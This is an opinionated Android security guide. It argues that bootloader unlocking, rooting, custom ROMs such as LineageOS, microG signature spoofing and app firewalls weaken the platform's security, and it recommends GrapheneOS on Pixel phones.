Android

Android by default has a strong security model with full system SELinux policies, strong app sandboxing, full verified boot, modern exploit mitigations like fine-grained forward-edge Control-Flow Integrity and ShadowCallStack, widespread use of memory-safe languages (Java) and more. This article talks about common ways people ruin the security model rather than criticisms of the security model itself.

Unlocking the bootloader

Unlocking the bootloader in Android is a massive security risk. It disables verified boot, a fundamental part of the security model. Verified boot ensures the integrity of the base system and boot chain to prevent malware persistence. If an attacker has managed to compromise the entire system and gain extremely high privileges, verified boot will revert their changes upon reboot and ensure they cannot persist.

Verified boot is not just for physical security as many people assume. Its main purpose is protection against remote attackers and the physical security is a nice side-effect.

Unlocking the bootloader is highly unrecommended.

Rooting your device

Rooting your device allows an attacker to easily gain extremely high privileges. Android's architecture is built upon principle of least privilege. By default, unrestricted root is found nowhere in the system thanks to the full system SELinux policy. Even the init system is not unrestricted root. Exposing privileges far greater than any other part of the OS to the application layer is very silly.

It does not matter if you have to whitelist apps that have root. An attacker can fake user input by for example, clickjacking or they can exploit vulnerabilities in apps that you have granted root to.

People often try to argue that if root was insecure then why does Linux allow root. Linux does not have a security model like Android does. On the usual Linux system, gaining root is extremely easy.

Custom ROMs

The majority of custom ROMs ruin the security model by disabling verified boot, using userdebug builds, disabling SELinux, not including firmware updates, and a lot more. A common ROM that does many of these is LineageOS.

LineageOS

LineageOS uses userdebug builds which adds tons of debugging tools as extra attack surface, weakens SELinux polices and exposes root access via adb. LineageOS requires an unlocked bootloader and disables verified boot which is essential to verify the integrity of the OS. It does not implement rollback protection so an attacker can downgrade the OS to an old version and exploit already patched vulnerabilities (you can tell as the updater allows you to downgrade versions). It does not include firmware updates which prevents you from getting new patches to fix vulnerabilities. And there are plenty more issues.

LineageOS (and most other custom ROMs) are focused on customizing the device and not privacy/security.

MicroG / Signature Spoofing

MicroG is a common alternative to Google Play Services. Many people use this to get rid of Google tracking on their device but many people do not realise that this substantially worsens security as it requires signature spoofing which allows apps to request to bypass signature verification.

Although, some signature spoofing implementations restrict it to make it less bad such as the one used by CalyxOS.

Firewalls

Firewalls such as AFWall+ or Netguard are regularly used on Android to attempt to block network access from a specific app but these do not reliably work. Apps can use IPC to bypass the restrictions. If you cut off network access to an app, it will not prevent the app from sending an intent to another app (such as the browser) to make it make the same connection.

Many apps already do this unintentionally with things such as with the download manager.

The most effective way to block network access is to run the app in its own profile so it cannot communicate with apps outside of the profile and revoke the INTERNET permission from the app like GrapheneOS allows you to do.

Conclusion

The best option for privacy/security on Android is to get a Pixel >=3 and flash GrapheneOS. GrapheneOS does not contain any tracking unlike the stock OS on most devices and includes many hardening enhancements such as a hardened memory allocator, hardened C library, hardened kernel, stricter SELinux policies and more.

Pixels are also the best hardware to use as they have lots of hardening other devices lack such as full verified boot with support for custom keys, Titan M, hardened basebands, a good IOMMU to isolate hardware devices, fine-grained forward-edge kernel Control-Flow Integrity, kernel ShadowCallStack, etc.

Remember that GrapheneOS cannot prevent you from ruining your privacy yourself. You still have to be careful regardless of the operating system.

Go back